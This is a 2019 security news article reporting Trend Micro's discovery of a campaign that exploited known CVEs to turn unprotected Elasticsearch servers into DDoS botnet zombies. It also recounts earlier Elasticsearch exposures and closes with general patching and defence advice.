Posted on
July 2, 2019 at
12:13 PM

The new attack comprises two phases, including one where existing crypto mining malware is deleted. This is not the first time Elasticsearch databases have displayed how vulnerable they can be.

The Discovery

Trend Micro’s IT researchers have
discovered a brand new malware campaign targeting Elasticsearch databases. These
databases store, retrieve, and manage document-oriented and semi-structured
information. It relies heavily on flexible models to construct and update
visitor profiles to meet low-latency and demanding workloads needed for
real-time engagement. Currently, more than 2000 companies are reported to use
ElasticSearch in their tech arsenal, including the well-known firm Uber.

The project takes advantage of publicly available or unprotected Elasticsearch databases and infects them with malware. This, in turn, converts them into botnet zombies, carrying out DDoS attacks.

One occurrence of the outbreak exploited
CVE-2015-1427, a prior that affected the Elasticsearch Groovy
scripting engine. Another came with the capability of exploiting CVE-2017-5638,
an RCE (remote code execution) vulnerability within Apache Struts 2.

Researchers found that the malware used is
Setag backdoor ware, which was initially discovered in 2017. Setag is armed
with capabilities such as launching stealing system data protocols and various
DDoS attacks.

Further investigation into the binaries revealed
the presence of a backdoor variant that had capabilities similar to that of BillGates
malware. The BillGates malware came to light in 2014, bearing the same features
as Setag, including compromising the targeted machine and the subsequent launch
of DDoS attacks.

The
Attack

This malware attacks in two phases. During the first phase, the malware runs a script (s67.sh) which closes down the firewall and outlines which shell to use. Over the second phase, the malware ran the s66.sh script which deletes specific files including a range of configuration files from the /tmp directory and any existing cryptominers installed by other hazard programs.

This removed traces of the initial
infection and downloaded the cybercriminals desired binary. This was all in a
bid to run its own sting operation. The researchers commented that they use expendable
domains to swap URLs as and when they are detected.

It is worth mentioning that these criminals
are utilizing compromised websites to drop their payload. Researchers are
concerned that continuing to abuse compromised websites will also allow them to
evade detection by websites, particularly those developed by the invaders. Such
capabilities of any malware are a huge “red flag.”

These cybercriminals used URL encoding
staged when the scripts are recovered, and compromise genuine websites. This could
mean they may just be testing their hacking tools. It is also possible that
they are readying their infrastructure before escalating to a cyberwar.

ElasticSearch
Poor History

Don’t forget, ElasticSearch
servers have a poor history
with malware. Bob Diachenko, another security
researcher, discovered over 4,000 ElasticSearch servers accommodating PoS
malware in September 2017. In total Diachenko also identified more than 15,000 ElasticSearch
servers that did not have any password or authentication protection.

Then, in November 2018, HackenProof found
an IP with a publicly available Elasticsearch cluster that left the personal
data of about 57
million US citizens unprotected
. Two months after this, Security Discovery
found an unprotected Elasticsearch server holding 24 million records of
personal data.

More recently, in April 2019, it was
reported that thousands of exposed Kibana instances made Elasticsearch
databases and servers publicly accessible.

How
to Defend Against Attack

Any firm that uses Elasticsearch should be
mindful of this new attack. Elasticsearch has issued a patch already to fix
this vulnerability; therefore, implement this patch and prevent yourself from being
a .

Security specialists can assist in defending against attack crusades that seek to deliver a DDoS botnet. They do so by adopting a comprehensive vulnerability management package that prioritizes software patches based on the level of risk detected by known security weaknesses. Businesses should also work to protect against DDoS attacks using anomaly detection, next-generation firewalls, and other applicable tools.

Summary

Another New Malware Attack Converts Elasticsearch Databases into Botnet Zombies  - wAAACwAAAAAAQABAEACAkQBADs  - Another New Malware Attack Converts Elasticsearch Databases into Botnet Zombies

Article Name

Another New Malware Attack Converts Elasticsearch Databases into Botnet Zombies

Description

The new malware attack comprises two phases, including one where existing crypto mining malware is deleted. This is not the first time Elasticsearch databases have displayed how vulnerable they can be.

Author


Ali Raza

Publisher Name


Koddos

Publisher Logo



Source link

No tags for this post.

LEAVE A REPLY

Please enter your comment!
Please enter your name here